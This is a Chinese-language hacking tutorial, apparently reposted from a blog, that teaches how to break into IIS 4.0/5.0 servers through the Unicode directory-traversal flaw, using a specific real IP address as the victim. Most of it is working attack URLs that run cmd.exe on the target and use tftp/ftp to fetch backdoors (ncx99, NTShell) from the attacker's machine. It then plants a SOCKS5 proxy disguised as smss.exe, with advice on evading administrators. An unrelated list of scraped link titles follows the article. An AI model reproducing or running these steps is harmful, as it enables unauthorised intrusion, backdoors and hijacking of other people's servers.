自从IIS服务出现UNICODE漏洞之后,攻击NT机器变成傻瓜化,任何人只要略懂一点黑软件的使用就能对有UNICODE漏洞(包括二次解码漏洞)的机器进行入侵!
首先简单介绍一下UNICODE漏洞
微软的IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和""而能利用"../"目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename帐号进行入侵。
该帐号在默认情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除,修改或执行,就如同一个用户成功登陆所能完成的一样。
虽然微软发布了补丁,如果没有将可执行的目录删除,还会存在二次解码漏洞!

各位可以使用现成的黑软对目标机器进行检测,如本军团啊达编写的"红舞鞋unicode扫描器"、安全焦点的"X-SCAN 0.61"、小榕的“流光”等等.....
本人常用"X-SCAN",因为它除了能扫描UNICODE漏洞之外还有其它用途!所以这次我就拿"X-SCAN"作为教学。

首先,到安全焦点主页(http://www.Xfocus.org)下载"X-SCAN",解压后运行"xscan_gui.exe"。(本次教学会有实例出现,所以在"扫描项目"中只选"IIS漏洞"和不使用插件)在"扫描范围"填入"216.167.117.53"然后开始扫描(会出现一个DOS窗口)。
完成(窗口消失)后按"查看结果",如果目标存在UNCODE漏洞就会在“【IIS检测结果】:”中显示出来!

大家不用担心安全问题,本次教学的老外主机稍后我会用出适当的处理!
到这一步,第一小节完成,各位有什么问题可以提出来,如果没有我就继续!

在IE地址栏中打入:
http://216.167.117.53/msadc/..%255c....exe?/c+dir+c:
就会将目标机器的C目录被列出。
现在就到上传木马或后门之类的东西,方法有很多种,本人最常用到的方法是利用echo回显、管道,如:ECHO HACK BY YOUCK>INDEX.HTM。这样就建立了一个内容为HACK BY YOUCK的INDEX.HTM文件。
但是IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符 “&|(,;%<>”,如果发现有这些字符就会返回500错误,所以不能直接使用CMD.EEX加管道符等。网上有很多说发现"引号字符是可以利用的,但我试过后不行。
经过我反复测试,只要将CMD.exe拷贝改成其它名就行了!(如果目标机器是NFTS格式的,WINNT目录是不能写操作的,所以要把他拷贝到根目录或者TEMP目录)
以下的例子中我是将他拷贝到c:winntsystem32目录中并改名为C.EXE
http://216.167.117.53/msadc/..%255c...2cmd.exe+c.exe
首先验证一下,执行:
http://216.167.117.53/msadc/..%255c....exe?/c+dir+c:
如果成功就会在IE中出现目标的C盘文件和目录。
我在这介绍两种上传文件的方法,一种比较适合非NT/2000学员,另一种最好是NT/2000是学员使用!
一、首先,下载http://www.cners.com/tools/unicode.zip
解压后有如下文件:
tftpd32.exe(一个FTP服务器)
ncx99.exe(telnet 到99端口)
这两个大家都熟悉吧,其他的不用管。
运行tftpd32.exe
这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。
回到你的浏览器,在地址栏里填入:
http://216.167.117.53/msadc/..%255c...cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\winnt\help\temp\ncx99.exe
???.???.???.???为你自己的IP,注意:c:\winnt\help\temp\ncx99.exe 其中c:\winnt\help\temp\为主机服务器目录,要看主机的具体情况而定。
然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:winnthelp emp目录了,您可以自己检查一下。
再使用如下调用来执行ncx99.exe
http://216.167.117.53/msadc/..%255c... emp cx99.exe
然后您就可以 telnet 216.167.117.53 99

二、首先你把需要上传的文件放到自已的FTP目录中,本人喜欢使用NTSHELL,因为它功能强大,可以查看进程和中止进程,盗取密码等等(它的自带使用说明),所以这次就上传它!(下载地址:http://cntroopers.myetang.com/weapons2.html)
在浏览器地址栏中填入:(其中XXX.XXX.XXX.XXX是你自己的IP地址)
http://216.167.117.53/msadc/..%255c...XXX.XXX.XXX.XXX>ftp.bin
http://216.167.117.53/msadc/..%255c...+echo+anonymous>>ftp.bin
http://216.167.117.53/msadc/..%255c...e?/c+echo+guest>>ftp.bin
http://216.167.117.53/msadc/..%255c...?/c+echo+binary>>ftp.bin
http://216.167.117.53/msadc/..%255c...get+ntshell.exe>>ftp.bin
http://216.167.117.53/msadc/..%255c...NTShellGINA.dll>>ftp.bin
http://216.167.117.53/msadc/..%255c...o+get+psapi.dll>>ftp.bin
http://216.167.117.53/msadc/..%255c...et+Explorer.exe>>ftp.bin
http://216.167.117.53/msadc/..%255c...xe?/c+echo+quit>>ftp.bin
接着验证一下是否正确:
http://216.167.117.53/msadc/..%255c.../c+type+ftp.bin
OK之后就执行:
http://216.167.117.53/msadc/..%255c...+ftp+-s:ftp.bin
稍后片刻再验证文件是否上传成功:
http://216.167.117.53/msadc/..%255c...32/c.exe?/c+dir
到了这一步,你就可以在IE地址栏运行木马:
http://216.167.117.53/msadc/..%255c...?/c+ntshell.exe
之后就可以在本地运行ntshellc.exe然后连上去目标机器了。

到了这一步,你就可以进入目标机器,但是权根还很低,至于怎样提升权限,各位可以参考论坛中的相关文章!

本人比较喜欢使用第二种方法,我通常在别的机器中放好上将要用到的文件,日后直接连上去下载就行,安全多了,:)

各位有什么问题可以即时提出,下一节将介绍如何在目标机器上开设代理服务!
这样,菜鸟都可以拥有属于自已的SOCK5代理服务器,日后进攻安全多了~

首先介绍一下需要用到的文件
1.sanke的代理跳板(SkSockServer)
下载地址:http://snake12.top263.net/SkSockServer/SkSockServer.htm
2.eBorder-client
下载地址:http://www.proxy365.com/

首先,找一台有UNICODE的WIN 2000肉机,将代理跳板(SkSockServer.exe)上传到目标机器在中,
并改名为Smss.exe(以下利用到我发现的WIN 2000漏洞)。然后在IE地址栏执行Smss.exe -debug 1028
这样目标机器就成为了SOCK5代理,端口为:1028
如果1028端口被占用,就改用其它的。
至于eBorder-client是代理软件,你也可以用sockCAP32或者其它支持SOCK5的代理软件~
在此就用以上的肉机进行教学!
运行NTSHELL:
http://216.167.117.53/msadc/..%255c...emp tshell.exe
在本地运行NTSHELLC.exe
连上目标机器:
o 216.167.117.53
输入默认口令:
let me in
再在IE地址栏填入:
http://216.167.117.53/msadc/..%255c...exe+-debug+1028
然后在NTSHELLC中看看他的进程:
?pslist
将没用的进程KILL掉:
?pskill XXX(XXX是进程ID,千万不要将Smss.exe进程也KILL 掉啊,:))

这样目标机器就开设了SOCK5代理服务,刚才开的进程连管理员也无法KILL掉,这是我发现的WIN2000任务管理器漏洞~
因为UNICODE得到的权根很低,所以不能作为服务运行,当然也可以提升权根,把SkSockServer作为服务运行!
至于怎样提升权限,在此我不作保绍了,日后有机会再介绍~
验证代理服务是否正常运行有很多种方法,比较方便就用QQ来验让一下,够方便嘛~
当然不用NTSHELL也可以,但这样会留下几个CMD.exe(或者C.exe)进程的,容易被管理员发现。
自已KILL掉他总比目标机器的管理员KILL掉好~
NTSHELL还有很多功能可用,一举两得,:)

最后,介绍一下我发现的WIN 2000任务管理器漏洞。
我把他命名为:WIN2000任务管理器漏洞
漏洞原因是WIN 2000任务管理器没有验证进程名字的大小写,从而将一些跟系统关键进程名字相同的进程误认为系统关键进程,因而任务管理器无法中止其进程~
如果你的系统是WIN 2000,可以作如下试验:
将CMD.exe复制并改名为:Smss.exe或者sMss.exe、smSs.exe
主要有最少一个字母是大写就行,因为smss.exe是系统关键进程,而WIN 2000没有验证大小写。
运行后在“任务管理器”中就会无法中止其进程!
当然在桌面可以关掉的~
如果是利用UNICODE漏洞运行,任何人都没有办法用“任务管理器”中止.
因为UNICODE是使用IUSR_machinename帐号,而IUSR_machinename帐号是IIS的匿名访问 Internet 信息服务的内置帐号,不能直接登录,当然就不能在桌面关掉此程序了~
但是利用其它工具也可将此进程KILL掉的! 

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10294527/viewspace-124662/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10294527/viewspace-124662/

关于WIN2000的入侵,以及安全防御等问题(转)相关推荐

  1. 入侵检测与防御技术基础

    网络入侵简介 典型的入侵行为 篡改web网页: 破解系统密码: 复制/查看敏感数据: 使用网络嗅探工具获取用户密码: 访问未经允许的服务器: 其他特殊硬件获取原始网络包: 向主机植入特洛伊木马程序: ...

  2. 举例说明一下常见的弱口令_常见网站入侵手段及防御方法

    上传入侵 上传入侵便是通过上传文件来获得权限,针对有上传文件权限的网站实施,好比论坛可以上传附件.资讯站可以投稿上传图片,这些都可能为上传木马提供便利,上传木马以后,很多信息都会轻松暴露出来的.这个漏 ...

  3. 局域网病毒入侵原理和防御

    局域网病毒入侵原理及现象 计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,使整个公司网络瘫痪无法正常运做,其损失是无法估计的. 一.局域网病毒入侵原理及现象 一般来 ...

  4. 各国“未雨绸缪”致网络安全陷入困境 安全防御诱发“防御性入侵”

    什么是"网络安全困境"? 古希腊历史学家修西底德斯(Thucydides)警告称,误解带来的冲突危险重重.当某个国家自我防御时,即使不对其它国家怀揣敌意,有时似乎也会构成威胁.其它 ...

  5. 学习笔记:入侵防御与检测基础

    入侵检测与防御基础 总体介绍 入侵检测 部署 入侵检测技术的实现 入侵防御系统 部署方式 对比 总体介绍 • 传统的信息安全方法采用严格的访问控制和数据加密策略来防护,但在复杂系统中,这些策略是不充分 ...

  6. Linux -- 利用IPS(入侵防御系统) 构建企业Web安全防护网

    一.IPS系统简介 (应用层上应用) 防火墙只在网络层上应用,IPS 和防火墙相比,检测及过滤功能更为强大,它通过串联在网络主干线路上,对防火 墙所不能过滤的攻击进行过滤.这样一个两级的过滤模式,可以 ...

  7. 网络入侵检测初步探测方法

    经过精心配置的Win2000服务器可以防御90%以上的入侵和渗透,但是,就象上一章结束时所提到的:系统安全是一个连续的过程,随着新漏洞的出现和服务器应用的变化,系统的安全状况也在不断变化着;同时由于攻 ...

  8. WIN2000服务器安全配置

    目前,WIN2000 SERVER是比较流行的服务器操作系统之一,但是要想安全的配置微软的这个操作系统,却不是一件容易的事.本文试图对win2000 SERVER的安全配置进行初步的探讨. 一. 定制 ...

  9. 基于机器学习的入侵检测系统

    导 语 在过去十年中,机器学习技术取得了快速进步,实现了以前从未想象过的自动化和预测能力.随着这一技术的发展促使研究人员和工程师为这些美妙的技术构思新的应用.不久,机器学习技术被用于加强网络安全系统. ...

最新文章

  1. 32位计算机能玩什么游戏,系统32位操作能玩什么游戏?
  2. Ubuntu没有chkconfig服务解决办法
  3. java 空间复杂度_时间复杂度和空间复杂度
  4. c语言编译 64位,cmake – 编译32位和64位
  5. OpenJudge 2796: 数字求和
  6. 桌面程序explorer_备份Internet Explorer 7搜索提供程序列表
  7. bigdecimal 保留两位小数_Python的保留小数及对齐
  8. C++基础10-类和对象之友元函数
  9. Java 代理访问http
  10. 【图像处理】参数维纳滤波(Parametric Wiener Filter)
  11. python程序员月薪-据说做Python程序员,都月薪上万?
  12. 数据库连接字符串的写法(参考)
  13. 【招聘】浙江大学杨杰课题组-博士后招聘-医学人工智能
  14. 超8千Star,火遍Github的Python反直觉案例集!
  15. Javascript php 异常捕获
  16. 游戏笔记本计算机购买,游戏笔记本电脑推荐 三分钟售罄TA为何如此火爆?
  17. 【软考软件评测师】2018综合知识历年真题
  18. 华为服务器找不到阵列卡_DELL 服务器R230 加载阵列卡驱动安装Server 2012R2操作系统...
  19. 计算机竞赛制作机器人,电脑制作活动机器人项目详细说明
  20. Codeforces Round #599 (Div. 1) C. Sum Balance(图+dp)

热门文章

  1. java 接口和抽象类的区别6_Java抽象类与接口的区别
  2. 微信开发者工具自定义tabBar导航
  3. php crypt blowfish,(PHP)如何在CRYPT_BLOWFISH中使用crypt()?
  4. 历史上最有才最搞怪的情书之一
  5. sql数据库,截取语句(截取每列中的字段)
  6. idea页面只能显示一个项目_IntelliJ IDEA 同一个窗口打开多个项目
  7. QGIS中怎样设置图层样式并导出地图样式
  8. 风口浪尖上的联想——股权与国有资产的原罪争议
  9. html 字母符号显示,HTML CSS 特殊字符表
  10. 自动驾驶的社会交互的综述和思考